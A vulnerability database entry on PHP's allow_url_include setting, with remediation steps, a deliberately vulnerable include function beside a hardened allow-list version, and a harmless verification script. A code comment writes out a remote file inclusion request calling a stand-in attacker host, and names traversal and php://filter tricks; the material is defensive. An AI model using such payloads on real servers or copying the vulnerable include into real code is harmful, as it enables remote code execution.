PHP allow_url_include Is Enabled - Vulnerability Database

Description

The PHP configuration directive allow_url_include is enabled on this server. It allows the include functions (include(), require(), include_once() and require_once()) to load and execute code through PHP's URL stream wrappers: files on remote hosts over http:// and ftp://, but also inline payloads supplied through the data: wrapper and the raw request body through php://input. Wherever user input reaches the path argument of one of these functions without strict validation, this turns a Local File Inclusion flaw into Remote File Inclusion (RFI): the attacker supplies a URL and the server fetches and executes the attacker's code with the privileges of the PHP process. The directive has defaulted to Off since it was introduced in PHP 5.2, and PHP 7.4 deprecated it; enabling it makes PHP emit a deprecation warning at startup.
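The include pattern the description refers to, beside a hardened version, as an added illustration that is not code from the Invicti entry. The page request parameter, the templates directory, the template names and the attacker host name are assumptions.

```php
<?php
// Added example (not code from the Invicti page). The "page" request parameter,
// the templates/ directory, the template names and attacker.example are assumptions.

// VULNERABLE: the request parameter is used as the include path.
// With allow_url_include=On, a request such as
//   ?page=http://attacker.example/payload.txt?
// makes PHP fetch and execute the remote file (the trailing "?" turns the
// appended ".php" into a query string on the attacker's URL), and the data:
// wrapper gives the same result without any remote host at all.
// With allow_url_include=Off those URLs are refused, but the function is still
// a local file inclusion flaw: "../" traversal to other local .php files and
// php://filter source-disclosure tricks are unaffected by the directive.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: the untrusted value only selects an entry from a fixed allow-list;
// the path itself is assembled from constants, so no user bytes end up in it.
const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_template(string $page): ?string
{
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return null;                 // unknown key: refuse, never try to "fix up"
    }
    return TEMPLATE_DIR . '/' . ALLOWED_PAGES[$page];
}

function render_page_hardened(string $page): void
{
    $path = resolve_template($page);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Entry point: reject non-string input (e.g. ?page[]=x) before it reaches the
// string-typed function, then fall back to the default template.
$page = $_GET['page'] ?? 'home';
render_page_hardened(is_string($page) ? $page : '');
```

The hardened version never filters or sanitizes the path; it refuses anything that is not a known key. That is the shape to look for during the code review recommended below, because path sanitizing (stripping "../", stripping "http://") is routinely bypassed.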

Remediation

Disable allow_url_include unless there is a specific, documented business requirement for including code from a remote location (there almost never is: code that must come from another host should be fetched, verified and stored locally, then included from disk). The directive is PHP_INI_SYSTEM, so it can only be changed in one of the following places, not from ini_set() in application code:

Method 1: Modify php.ini (Recommended)
Locate the php.ini actually loaded by the web server's PHP SAPI (the file reported by phpinfo() or php_ini_loaded_file(); the CLI command php --ini may point at a different file) and set:

allow_url_include = Off

Method 2: Configure via the web server or PHP-FPM
Setting allow_url_include in .htaccess does not work: php_flag in .htaccess only applies to PHP_INI_PERDIR directives, mod_php ignores it for this PHP_INI_SYSTEM directive, and php_admin_flag is not permitted in .htaccess at all. With mod_php, put it in httpd.conf or the virtual host definition instead:
php_admin_flag allow_url_include Off
With PHP-FPM, Apache and nginx directives never reach PHP; use php.ini or the pool configuration file:
php_admin_flag[allow_url_include] = off

Additional Security Measures:
• Review all code using include(), require(), include_once(), and require_once() and make sure user input never reaches the path argument. Disabling allow_url_include blocks the remote, data: and php://input variants, but a user-controlled include path remains a Local File Inclusion flaw (directory traversal, php://filter source disclosure) until the code is fixed
• Where the file to include must depend on input, map the input onto a fixed whitelist of known file names and build the path from constants, rather than trying to filter or sanitize the path
• Consider disabling allow_url_fopen as well if the application does not need to open remote URLs with fopen(), file_get_contents() and similar functions. allow_url_fopen=Off also blocks http://, ftp:// and data: in include (the PHP manual notes that allow_url_include requires allow_url_fopen), but not php://input, which is governed by allow_url_include alone, so disable allow_url_include explicitly in any case
• Restart or reload the process that runs PHP after changing the configuration: the web server for mod_php, the php-fpm service for PHP-FPM. Then verify from the same SAPI, with phpinfo() or ini_get('allow_url_include'), that the new value is in effect
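A runtime check to confirm that the change took effect, added here and not part of the Invicti entry. Serve it briefly from the same SAPI as the application (through the web server or php-fpm), because the CLI often loads a different php.ini. It reports the configured values, shows that ini_set() cannot alter the directive, and makes a harmless data: include attempt that only succeeds when URL includes are effectively allowed. The check names and the returned marker string are this example's own.

```php
<?php
// Added verification script (not part of the Invicti entry). Serve it from the
// same SAPI as the application, since the CLI may load a different php.ini.

// ini_get() returns the raw configured string ("1", "", "0", "On", ...).
// Normalise it the way PHP's own boolean ini handling does: "on", "yes" and
// "true" are true; any other value is converted with atoi(), so "1" is true
// and "", "0" and "Off" are false.
function ini_bool(string $name): bool
{
    $v = strtolower(trim((string) ini_get($name)));
    if (in_array($v, ['on', 'yes', 'true'], true)) {
        return true;
    }
    return (int) $v !== 0;
}

// allow_url_include is PHP_INI_SYSTEM: only php.ini or the server's main
// configuration can change it. ini_set() therefore returns false, which is
// also why a php_flag in .htaccess cannot turn it off.
function ini_set_refused(): bool
{
    return ini_set('allow_url_include', '0') === false;
}

// Behavioural probe: include inert PHP code through the data: wrapper.
// data: is a URL wrapper, so the include only succeeds when URL includes are
// effectively permitted (allow_url_include and allow_url_fopen both on),
// whatever any php.ini on disk says. The included code just returns a string.
function url_include_allowed(): bool
{
    $code   = '<?php return "url-wrapper-include-allowed";';
    $stream = 'data://text/plain;base64,' . base64_encode($code);
    $result = @include $stream;      // warning suppressed; false when refused
    return $result === 'url-wrapper-include-allowed';
}

function report(): array
{
    return [
        'loaded php.ini'                 => php_ini_loaded_file() ?: '(none)',
        'allow_url_include (ini_get)'    => ini_bool('allow_url_include'),
        'allow_url_fopen (ini_get)'      => ini_bool('allow_url_fopen'),
        'ini_set() refused (INI_SYSTEM)' => ini_set_refused(),
        'URL wrapper include works'      => url_include_allowed(),
    ];
}

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/plain');
}
foreach (report() as $check => $value) {
    printf("%-32s %s\n", $check, is_bool($value) ? ($value ? 'YES' : 'no') : $value);
}
```

After a correct remediation the two ini_get lines read "no" and "URL wrapper include works" reads "no"; if ini_get already shows allow_url_include off but the probe still succeeds, the running PHP process has not been restarted or is reading a different php.ini than the one edited. Remove the script from the document root once the check is done.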
